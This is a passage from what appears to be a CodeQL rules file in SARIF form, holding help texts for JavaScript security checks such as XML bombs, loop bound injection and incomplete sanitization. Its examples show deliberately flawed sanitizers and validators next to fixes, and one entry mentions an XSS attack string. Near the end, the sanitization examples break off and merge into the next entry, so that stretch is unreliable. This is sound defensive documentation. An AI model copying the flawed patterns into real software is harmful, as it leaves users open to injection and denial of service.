when a regular expression literal is turned into a regular expression that is built from one or more string literals. The problem occurs when a regular expression escape sequence loses its special meaning in a string literal.\n\n\n## Recommendation\nEnsure that the right amount of backslashes is used when escaping characters in strings, template literals and regular expressions. 
Pay special attention to the number of backslashes when rewriting a regular expression as a string literal.\n\n\n## Example\nThe following example code checks that a string is `\"my-marker\"`, possibly surrounded by white space:\n\n\n```javascript\nlet regex = new RegExp('(^\\s*)my-marker(\\s*$)'),\n isMyMarkerText = regex.test(text);\n\n```\nHowever, the check does not work properly for white space as the two `\\s` occurrences are semantically equivalent to just `s`, meaning that the check will succeed for strings like `\"smy-markers\"` instead of `\" my-marker \"`. Address these shortcomings by either using a regular expression literal (`/(^\\s*)my-marker(\\s*$)/`), or by adding extra backslashes (`'(^\\\\s*)my-marker(\\\\s*$)'`).\n\n\n## References\n* MDN: [Regular expression escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#Escaping)\n* MDN: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], - "description" : "Prepending a backslash to an ordinary character in a string\n does not have any effect, and may make regular expressions constructed from this string\n behave unexpectedly.", - "id" : "js/useless-regexp-character-escape", - "kind" : "problem", - "name" : "Useless regular-expression character escape", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "7.8" - } - }, { - "id" : "js/overly-large-range", - "name" : "js/overly-large-range", - "shortDescription" : { - "text" : "Overly permissive regular expression range" - }, - "fullDescription" : { - "text" : "Overly permissive regular expression ranges match a wider range of characters than intended. This may allow an attacker to bypass a filter or sanitizer." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Overly permissive regular expression range\nIt's easy to write a regular expression range that matches a wider range of characters than you intended. For example, `/[a-zA-z]/` matches all lowercase and all uppercase letters, as you would expect, but it also matches the characters: `` [ \\ ] ^ _ ` ``.\n\nAnother common problem is failing to escape the dash character in a regular expression. An unescaped dash is interpreted as part of a range. For example, in the character class `[a-zA-Z0-9%=.,-_]` the last character range matches the 55 characters between `,` and `_` (both included), which overlaps with the range `[0-9]` and is clearly not intended by the writer.\n\n\n## Recommendation\nAvoid any confusion about which characters are included in the range by writing unambiguous regular expressions. Always check that character ranges match only the expected characters.\n\n\n## Example\nThe following example code is intended to check whether a string is a valid 6 digit hex color.\n\n```javascript\n\nfunction isValidHexColor(color) {\n return /^#[0-9a-fA-f]{6}$/i.test(color);\n}\n\n```\nHowever, the `A-f` range is overly large and matches every uppercase character. 
It would parse a \"color\" like `#XXYYZZ` as valid.\n\nThe fix is to use an uppercase `A-F` range instead.\n\n```javascript\n\nfunction isValidHexColor(color) {\n return /^#[0-9A-F]{6}$/i.test(color);\n}\n\n```\n\n## References\n* GitHub Advisory Database: [CVE-2021-42740: Improper Neutralization of Special Elements used in a Command in Shell-quote](https://github.com/advisories/GHSA-g4rg-993r-mgx7)\n* wh0.github.io: [Exploiting CVE-2021-42740](https://wh0.github.io/2021/10/28/shell-quote-rce-exploiting.html)\n* Yosuke Ota: [no-obscure-range](https://ota-meshi.github.io/eslint-plugin-regexp/rules/no-obscure-range.html)\n* Paul Boyd: [The regex \\[,-.\\]](https://pboyd.io/posts/comma-dash-dot/)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", - "markdown" : "# Overly permissive regular expression range\nIt's easy to write a regular expression range that matches a wider range of characters than you intended. For example, `/[a-zA-z]/` matches all lowercase and all uppercase letters, as you would expect, but it also matches the characters: `` [ \\ ] ^ _ ` ``.\n\nAnother common problem is failing to escape the dash character in a regular expression. An unescaped dash is interpreted as part of a range. For example, in the character class `[a-zA-Z0-9%=.,-_]` the last character range matches the 55 characters between `,` and `_` (both included), which overlaps with the range `[0-9]` and is clearly not intended by the writer.\n\n\n## Recommendation\nAvoid any confusion about which characters are included in the range by writing unambiguous regular expressions. Always check that character ranges match only the expected characters.\n\n\n## Example\nThe following example code is intended to check whether a string is a valid 6 digit hex color.\n\n```javascript\n\nfunction isValidHexColor(color) {\n return /^#[0-9a-fA-f]{6}$/i.test(color);\n}\n\n```\nHowever, the `A-f` range is overly large and matches every uppercase character. 
It would parse a \"color\" like `#XXYYZZ` as valid.\n\nThe fix is to use an uppercase `A-F` range instead.\n\n```javascript\n\nfunction isValidHexColor(color) {\n return /^#[0-9A-F]{6}$/i.test(color);\n}\n\n```\n\n## References\n* GitHub Advisory Database: [CVE-2021-42740: Improper Neutralization of Special Elements used in a Command in Shell-quote](https://github.com/advisories/GHSA-g4rg-993r-mgx7)\n* wh0.github.io: [Exploiting CVE-2021-42740](https://wh0.github.io/2021/10/28/shell-quote-rce-exploiting.html)\n* Yosuke Ota: [no-obscure-range](https://ota-meshi.github.io/eslint-plugin-regexp/rules/no-obscure-range.html)\n* Paul Boyd: [The regex \\[,-.\\]](https://pboyd.io/posts/comma-dash-dot/)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], - "description" : "Overly permissive regular expression ranges match a wider range of characters than intended.\n This may allow an attacker to bypass a filter or sanitizer.", - "id" : "js/overly-large-range", - "kind" : "problem", - "name" : "Overly permissive regular expression range", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "5.0" - } - }, { - "id" : "js/incomplete-url-scheme-check", - "name" : "js/incomplete-url-scheme-check", - "shortDescription" : { - "text" : "Incomplete URL scheme check" - }, - "fullDescription" : { - "text" : "Checking for the \"javascript:\" URL scheme without also checking for \"vbscript:\" and \"data:\" suggests a logic error or even a security vulnerability." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Incomplete URL scheme check\nURLs starting with `javascript:` can be used to encode JavaScript code to be executed when the URL is visited. 
While this is a powerful mechanism for creating feature-rich and responsive web applications, it is also a potential security risk: if the URL comes from an untrusted source, it might contain harmful JavaScript code. For this reason, many frameworks and libraries first check the URL scheme of any untrusted URL, and reject URLs with the `javascript:` scheme.\n\nHowever, the `data:` and `vbscript:` schemes can be used to represent executable code in a very similar way, so any validation logic that checks against `javascript:`, but not against `data:` and `vbscript:`, is likely to be insufficient.\n\n\n## Recommendation\nAdd checks covering both `data:` and `vbscript:`.\n\n\n## Example\nThe following function validates a (presumably untrusted) URL `url`. If it starts with `javascript:` (case-insensitive and potentially preceded by whitespace), the harmless placeholder URL `about:blank` is returned to prevent code injection; otherwise `url` itself is returned.\n\n\n```javascript\nfunction sanitizeUrl(url) {\n let u = decodeURI(url).trim().toLowerCase();\n if (u.startsWith(\"javascript:\"))\n return \"about:blank\";\n return url;\n}\n\n```\nWhile this check provides partial projection, it should be extended to cover `data:` and `vbscript:` as well:\n\n\n```javascript\nfunction sanitizeUrl(url) {\n let u = decodeURI(url).trim().toLowerCase();\n if (u.startsWith(\"javascript:\") || u.startsWith(\"data:\") || u.startsWith(\"vbscript:\"))\n return \"about:blank\";\n return url;\n}\n\n```\n\n## References\n* WHATWG: [URL schemes](https://wiki.whatwg.org/wiki/URL_schemes).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n", - "markdown" : "# Incomplete URL scheme check\nURLs starting with `javascript:` can be used to encode JavaScript code to be executed when the URL is visited. 
While this is a powerful mechanism for creating feature-rich and responsive web applications, it is also a potential security risk: if the URL comes from an untrusted source, it might contain harmful JavaScript code. For this reason, many frameworks and libraries first check the URL scheme of any untrusted URL, and reject URLs with the `javascript:` scheme.\n\nHowever, the `data:` and `vbscript:` schemes can be used to represent executable code in a very similar way, so any validation logic that checks against `javascript:`, but not against `data:` and `vbscript:`, is likely to be insufficient.\n\n\n## Recommendation\nAdd checks covering both `data:` and `vbscript:`.\n\n\n## Example\nThe following function validates a (presumably untrusted) URL `url`. If it starts with `javascript:` (case-insensitive and potentially preceded by whitespace), the harmless placeholder URL `about:blank` is returned to prevent code injection; otherwise `url` itself is returned.\n\n\n```javascript\nfunction sanitizeUrl(url) {\n let u = decodeURI(url).trim().toLowerCase();\n if (u.startsWith(\"javascript:\"))\n return \"about:blank\";\n return url;\n}\n\n```\nWhile this check provides partial projection, it should be extended to cover `data:` and `vbscript:` as well:\n\n\n```javascript\nfunction sanitizeUrl(url) {\n let u = decodeURI(url).trim().toLowerCase();\n if (u.startsWith(\"javascript:\") || u.startsWith(\"data:\") || u.startsWith(\"vbscript:\"))\n return \"about:blank\";\n return url;\n}\n\n```\n\n## References\n* WHATWG: [URL schemes](https://wiki.whatwg.org/wiki/URL_schemes).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n" - }, - "properties" : { - "tags" : [ "security", "correctness", "external/cwe/cwe-020", "external/cwe/cwe-184" ], - "description" : "Checking for the \"javascript:\" URL scheme without also checking for \"vbscript:\"\n and 
\"data:\" suggests a logic error or even a security vulnerability.", - "id" : "js/incomplete-url-scheme-check", - "kind" : "problem", - "name" : "Incomplete URL scheme check", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.8" - } - }, { - "id" : "js/xml-bomb", - "name" : "js/xml-bomb", - "shortDescription" : { - "text" : "XML internal entity expansion" - }, - "fullDescription" : { - "text" : "Parsing user input as an XML document with arbitrary internal entity expansion is vulnerable to denial-of-service attacks." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# XML internal entity expansion\nParsing untrusted XML files with a weakly configured XML parser may be vulnerable to denial-of-service (DoS) attacks exploiting uncontrolled internal entity expansion.\n\nIn XML, so-called *internal entities* are a mechanism for introducing an abbreviation for a piece of text or part of a document. When a parser that has been configured to expand entities encounters a reference to an internal entity, it replaces the entity by the data it represents. The replacement text may itself contain other entity references, which are expanded recursively. This means that entity expansion can increase document size dramatically.\n\nIf untrusted XML is parsed with entity expansion enabled, a malicious attacker could submit a document that contains very deeply nested entity definitions, causing the parser to take a very long time or use large amounts of memory. This is sometimes called an *XML bomb* attack.\n\n\n## Recommendation\nThe safest way to prevent XML bomb attacks is to disable entity expansion when parsing untrusted data. How this is done depends on the library being used. 
Note that some libraries, such as recent versions of `libxmljs` (though not its SAX parser API), disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action is needed.\n\n\n## Example\nThe following example uses the XML parser provided by the `node-expat` package to parse a string `xmlSrc`. If that string is from an untrusted source, this code may be vulnerable to a DoS attack, since `node-expat` expands internal entities by default:\n\n\n```javascript\nconst app = require(\"express\")(),\n expat = require(\"node-expat\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n parser = new expat.Parser();\n parser.on(\"startElement\", handleStart);\n parser.on(\"text\", handleText);\n parser.write(xmlSrc);\n});\n\n```\nAt the time of writing, `node-expat` does not provide a way of controlling entity expansion, but the example could be rewritten to use the `sax` package instead, which only expands standard entities such as `&`:\n\n\n```javascript\nconst app = require(\"express\")(),\n sax = require(\"sax\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n parser = sax.parser(true);\n parser.onopentag = handleStart;\n parser.ontext = handleText;\n parser.write(xmlSrc);\n});\n\n```\n\n## References\n* Wikipedia: [Billion Laughs](https://en.wikipedia.org/wiki/Billion_laughs).\n* Bryan Sullivan: [Security Briefs - XML Denial of Service Attacks and Defenses](https://msdn.microsoft.com/en-us/magazine/ee335713.aspx).\n* Common Weakness Enumeration: [CWE-776](https://cwe.mitre.org/data/definitions/776.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", - "markdown" : "# XML internal entity expansion\nParsing untrusted XML files with a weakly configured XML parser may be vulnerable to denial-of-service (DoS) attacks exploiting uncontrolled internal entity expansion.\n\nIn XML, so-called *internal entities* are a mechanism for introducing an 
abbreviation for a piece of text or part of a document. When a parser that has been configured to expand entities encounters a reference to an internal entity, it replaces the entity by the data it represents. The replacement text may itself contain other entity references, which are expanded recursively. This means that entity expansion can increase document size dramatically.\n\nIf untrusted XML is parsed with entity expansion enabled, a malicious attacker could submit a document that contains very deeply nested entity definitions, causing the parser to take a very long time or use large amounts of memory. This is sometimes called an *XML bomb* attack.\n\n\n## Recommendation\nThe safest way to prevent XML bomb attacks is to disable entity expansion when parsing untrusted data. How this is done depends on the library being used. Note that some libraries, such as recent versions of `libxmljs` (though not its SAX parser API), disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action is needed.\n\n\n## Example\nThe following example uses the XML parser provided by the `node-expat` package to parse a string `xmlSrc`. 
If that string is from an untrusted source, this code may be vulnerable to a DoS attack, since `node-expat` expands internal entities by default:\n\n\n```javascript\nconst app = require(\"express\")(),\n expat = require(\"node-expat\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n parser = new expat.Parser();\n parser.on(\"startElement\", handleStart);\n parser.on(\"text\", handleText);\n parser.write(xmlSrc);\n});\n\n```\nAt the time of writing, `node-expat` does not provide a way of controlling entity expansion, but the example could be rewritten to use the `sax` package instead, which only expands standard entities such as `&`:\n\n\n```javascript\nconst app = require(\"express\")(),\n sax = require(\"sax\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n parser = sax.parser(true);\n parser.onopentag = handleStart;\n parser.ontext = handleText;\n parser.write(xmlSrc);\n});\n\n```\n\n## References\n* Wikipedia: [Billion Laughs](https://en.wikipedia.org/wiki/Billion_laughs).\n* Bryan Sullivan: [Security Briefs - XML Denial of Service Attacks and Defenses](https://msdn.microsoft.com/en-us/magazine/ee335713.aspx).\n* Common Weakness Enumeration: [CWE-776](https://cwe.mitre.org/data/definitions/776.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-776", "external/cwe/cwe-400" ], - "description" : "Parsing user input as an XML document with arbitrary internal\n entity expansion is vulnerable to denial-of-service attacks.", - "id" : "js/xml-bomb", - "kind" : "path-problem", - "name" : "XML internal entity expansion", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/loop-bound-injection", - "name" : "js/loop-bound-injection", - "shortDescription" : { - "text" : "Loop bound injection" - }, - "fullDescription" : { - "text" : "Iterating over an object 
with a user-controlled .length property can cause indefinite looping." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Loop bound injection\nUsing the `.length` property of an untrusted object as a loop bound may cause indefinite looping since a malicious attacker can set the `.length` property to a very large number. For example, when a program that expects an array is passed a JSON object such as `{length: 1e100}`, the loop will be run for 10100 iterations. This may cause the program to hang or run out of memory, which can be used to mount a denial-of-service (DoS) attack.\n\n\n## Recommendation\nEither check that the object is indeed an array or limit the size of the `.length` property.\n\n\n## Example\nIn the example below, an HTTP request handler iterates over a user-controlled object `obj` using the `obj.length` property in order to copy the elements from `obj` to an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n var obj = req.body;\n\n var ret = [];\n\n // Potential DoS if obj.length is large.\n for (var i = 0; i < obj.length; i++) {\n ret.push(obj[i]);\n }\n});\n\n```\nThis is not secure since an attacker can control the value of `obj.length`, and thereby cause the loop to iterate indefinitely. 
Here the potential DoS is fixed by enforcing that the user-controlled object is an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n var obj = req.body;\n \n if (!(obj instanceof Array)) { // Prevents DoS.\n return [];\n }\n\n var ret = [];\n\n for (var i = 0; i < obj.length; i++) {\n ret.push(obj[i]);\n }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-834](https://cwe.mitre.org/data/definitions/834.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n", - "markdown" : "# Loop bound injection\nUsing the `.length` property of an untrusted object as a loop bound may cause indefinite looping since a malicious attacker can set the `.length` property to a very large number. For example, when a program that expects an array is passed a JSON object such as `{length: 1e100}`, the loop will be run for 10100 iterations. This may cause the program to hang or run out of memory, which can be used to mount a denial-of-service (DoS) attack.\n\n\n## Recommendation\nEither check that the object is indeed an array or limit the size of the `.length` property.\n\n\n## Example\nIn the example below, an HTTP request handler iterates over a user-controlled object `obj` using the `obj.length` property in order to copy the elements from `obj` to an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n var obj = req.body;\n\n var ret = [];\n\n // Potential DoS if obj.length is large.\n for (var i = 0; i < obj.length; i++) {\n ret.push(obj[i]);\n }\n});\n\n```\nThis is not secure since an attacker can control the value of `obj.length`, and thereby cause the loop to iterate indefinitely. 
Here the potential DoS is fixed by enforcing that the user-controlled object is an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n var obj = req.body;\n \n if (!(obj instanceof Array)) { // Prevents DoS.\n return [];\n }\n\n var ret = [];\n\n for (var i = 0; i < obj.length; i++) {\n ret.push(obj[i]);\n }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-834](https://cwe.mitre.org/data/definitions/834.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-834", "external/cwe/cwe-730" ], - "description" : "Iterating over an object with a user-controlled .length\n property can cause indefinite looping.", - "id" : "js/loop-bound-injection", - "kind" : "path-problem", - "name" : "Loop bound injection", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/exposure-of-private-files", - "name" : "js/exposure-of-private-files", - "shortDescription" : { - "text" : "Exposure of private files" - }, - "fullDescription" : { - "text" : "Exposing a node_modules folder, or the project folder to the public, can cause exposure of private information." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Exposure of private files\nLibraries like `express` provide easy methods for serving entire directories of static files from a web server. However, using these can sometimes lead to accidental information exposure. If for example the `node_modules` folder is served, then an attacker can access the `_where` field from a `package.json` file, which gives access to the absolute path of the file.\n\n\n## Recommendation\nLimit which folders of static files are served from a web server.\n\n\n## Example\nIn the example below, all the files from the `node_modules` are served. 
This allows clients to easily access all the files inside that folder, which includes potentially private information inside `package.json` files.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules')));\n```\nThe issue has been fixed below by only serving specific folders within the `node_modules` folder.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use(\"jquery\", express.static('./node_modules/jquery/dist'));\napp.use(\"bootstrap\", express.static('./node_modules/bootstrap/dist'));\n```\n\n## References\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-219](https://cwe.mitre.org/data/definitions/219.html).\n* Common Weakness Enumeration: [CWE-548](https://cwe.mitre.org/data/definitions/548.html).\n", - "markdown" : "# Exposure of private files\nLibraries like `express` provide easy methods for serving entire directories of static files from a web server. However, using these can sometimes lead to accidental information exposure. If for example the `node_modules` folder is served, then an attacker can access the `_where` field from a `package.json` file, which gives access to the absolute path of the file.\n\n\n## Recommendation\nLimit which folders of static files are served from a web server.\n\n\n## Example\nIn the example below, all the files from the `node_modules` are served. 
This allows clients to easily access all the files inside that folder, which includes potentially private information inside `package.json` files.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules')));\n```\nThe issue has been fixed below by only serving specific folders within the `node_modules` folder.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use(\"jquery\", express.static('./node_modules/jquery/dist'));\napp.use(\"bootstrap\", express.static('./node_modules/bootstrap/dist'));\n```\n\n## References\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-219](https://cwe.mitre.org/data/definitions/219.html).\n* Common Weakness Enumeration: [CWE-548](https://cwe.mitre.org/data/definitions/548.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-200", "external/cwe/cwe-219", "external/cwe/cwe-548" ], - "description" : "Exposing a node_modules folder, or the project folder to the public, can cause exposure\n of private information.", - "id" : "js/exposure-of-private-files", - "kind" : "problem", - "name" : "Exposure of private files", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "6.5" - } - }, { - "id" : "js/incomplete-sanitization", - "name" : "js/incomplete-sanitization", - "shortDescription" : { - "text" : "Incomplete string escaping or encoding" - }, - "fullDescription" : { - "text" : "A string transformer that does not replace or escape all occurrences of a meta-character may be ineffective." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Incomplete string escaping or encoding\nSanitizing untrusted input is a common technique for preventing injection attacks such as SQL injection or cross-site scripting. Usually, this is done by escaping meta-characters such as quotes in a domain-specific way so that they are treated as normal characters.\n\nHowever, directly using the string `replace` method to perform escaping is notoriously error-prone. Common mistakes include only replacing the first occurrence of a meta-character, or backslash-escaping various meta-characters but not the backslash itself.\n\nIn the former case, later meta-characters are left undisturbed and can be used to subvert the sanitization. In the latter case, preceding a meta-character with a backslash leads to the backslash being escaped, but the meta-character appearing un-escaped, which again makes the sanitization ineffective.\n\nEven if the escaped string is not used in a security-critical context, incomplete escaping may still have undesirable effects, such as badly rendered or confusing output.\n\n\n## Recommendation\nUse a (well-tested) sanitization library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\nOtherwise, make sure to use a regular expression with the `g` flag to ensure that all occurrences are replaced, and remember to escape backslashes if applicable.\n\n\n## Example\nFor example, assume that we want to embed a user-controlled string `accountNumber` into a SQL query as part of a string literal. To avoid SQL injection, we need to ensure that the string does not contain un-escaped single-quote characters. 
The following function attempts to ensure this by doubling single quotes, and thereby escaping them:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(\"'\", \"''\");\n}\n\n```\nAs written, this sanitizer is ineffective: if the first argument to `replace` is a string literal (as in this case), only the *first* occurrence of that string is replaced.\n\nAs mentioned above, the function `escapeQuotes` should be replaced with a purpose-built sanitization library, such as the npm module `sqlstring`. Many other sanitization libraries are available from npm and other sources.\n\nIf this is not an option, `escapeQuotes` should be rewritten to use a regular expression with the `g` (\"global\") flag instead:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(/'/g, \"''\");\n}\n\n```\nNote that it is very important to include the global flag: `s.replace(/'/, \"''\")` *without* the global flag is equivalent to the first example above and only replaces the first quote.\n\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* npm: [sqlstring](https://www.npmjs.com/package/sqlstring) package.\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Incomplete string escaping or encoding\nSanitizing untrusted input is a common technique for preventing injection attacks such as SQL injection or cross-site scripting. Usually, this is done by escaping meta-characters such as quotes in a domain-specific way so that they are treated as normal characters.\n\nHowever, directly using the string `replace` method to perform escaping is notoriously error-prone. 
Common mistakes include only replacing the first occurrence of a meta-character, or backslash-escaping various meta-characters but not the backslash itself.\n\nIn the former case, later meta-characters are left undisturbed and can be used to subvert the sanitization. In the latter case, preceding a meta-character with a backslash leads to the backslash being escaped, but the meta-character appearing un-escaped, which again makes the sanitization ineffective.\n\nEven if the escaped string is not used in a security-critical context, incomplete escaping may still have undesirable effects, such as badly rendered or confusing output.\n\n\n## Recommendation\nUse a (well-tested) sanitization library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\nOtherwise, make sure to use a regular expression with the `g` flag to ensure that all occurrences are replaced, and remember to escape backslashes if applicable.\n\n\n## Example\nFor example, assume that we want to embed a user-controlled string `accountNumber` into a SQL query as part of a string literal. To avoid SQL injection, we need to ensure that the string does not contain un-escaped single-quote characters. The following function attempts to ensure this by doubling single quotes, and thereby escaping them:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(\"'\", \"''\");\n}\n\n```\nAs written, this sanitizer is ineffective: if the first argument to `replace` is a string literal (as in this case), only the *first* occurrence of that string is replaced.\n\nAs mentioned above, the function `escapeQuotes` should be replaced with a purpose-built sanitization library, such as the npm module `sqlstring`. 
Many other sanitization libraries are available from npm and other sources.\n\nIf this is not an option, `escapeQuotes` should be rewritten to use a regular expression with the `g` (\"global\") flag instead:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(/'/g, \"''\");\n}\n\n```\nNote that it is very important to include the global flag: `s.replace(/'/, \"''\")` *without* the global flag is equivalent to the first example above and only replaces the first quote.\n\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* npm: [sqlstring](https://www.npmjs.com/package/sqlstring) package.\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-020", "external/cwe/cwe-080", "external/cwe/cwe-116" ], - "description" : "A string transformer that does not replace or escape all occurrences of a\n meta-character may be ineffective.", - "id" : "js/incomplete-sanitization", - "kind" : "problem", - "name" : "Incomplete string escaping or encoding", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.8" - } - }, { - "id" : "js/incomplete-multi-character-sanitization", - "name" : "js/incomplete-multi-character-sanitization", - "shortDescription" : { - "text" : "Incomplete multi-character sanitization" - }, - "fullDescription" : { - "text" : "A sanitizer that removes a sequence of characters may reintroduce the dangerous sequence." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Incomplete multi-character sanitization\nSanitizing untrusted input is a common technique for preventing injection attacks and other security vulnerabilities. Regular expressions are often used to perform this sanitization. However, when the regular expression matches multiple consecutive characters, replacing it just once can result in the unsafe text reappearing in the sanitized input.\n\nAttackers can exploit this issue by crafting inputs that, when sanitized with an ineffective regular expression, still contain malicious code or content. This can lead to code execution, data exposure, or other vulnerabilities.\n\n\n## Recommendation\nTo prevent this issue, it is highly recommended to use a well-tested sanitization library whenever possible. These libraries are more likely to handle corner cases and ensure effective sanitization.\n\nIf a library is not an option, you can consider alternative strategies to fix the issue. 
For example, applying the regular expression replacement repeatedly until no more replacements can be performed, or rewriting the regular expression to match single characters instead of the entire unsafe text.\n\n\n## Example\nConsider the following JavaScript code that aims to remove all HTML comment start and end tags:\n\n```javascript\n\nstr.replace(/`, and that HTML tag names can contain upper case characters.\n\n\n## References\n* Securitum: [The Curious Case of Copy & Paste](https://research.securitum.com/the-curious-case-of-copy-paste/).\n* stackoverflow.com: [You can't parse \\[X\\]HTML with regex](https://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags#answer-1732454).\n* HTML Standard: [Comment end bang state](https://html.spec.whatwg.org/multipage/parsing.html#comment-end-bang-state).\n* stackoverflow.com: [Why aren't browsers strict about HTML?](https://stackoverflow.com/questions/25559999/why-arent-browsers-strict-about-html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n* Common Weakness Enumeration: [CWE-185](https://cwe.mitre.org/data/definitions/185.html).\n* Common Weakness Enumeration: [CWE-186](https://cwe.mitre.org/data/definitions/186.html).\n", - "markdown" : "# Bad HTML filtering regexp\nIt is possible to match some single HTML tags using regular expressions (parsing general HTML using regular expressions is impossible). 
However, if the regular expression is not written well it might be possible to circumvent it, which can lead to cross-site scripting or other security issues.\n\nSome of these mistakes are caused by browsers having very forgiving HTML parsers, and will often render invalid HTML containing syntax errors. Regular expressions that attempt to match HTML should also recognize tags containing such syntax errors.\n\n\n## Recommendation\nUse a well-tested sanitization or parser library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\n\n## Example\nThe following example attempts to filters out all `` as script end tags, but also tags such as `` even though it is a parser error. This means that an attack string such as `` will not be filtered by the function, and `alert(1)` will be executed by a browser if the string is rendered as HTML.\n\nOther corner cases include that HTML comments can end with `--!>`, and that HTML tag names can contain upper case characters.\n\n\n## References\n* Securitum: [The Curious Case of Copy & Paste](https://research.securitum.com/the-curious-case-of-copy-paste/).\n* stackoverflow.com: [You can't parse \\[X\\]HTML with 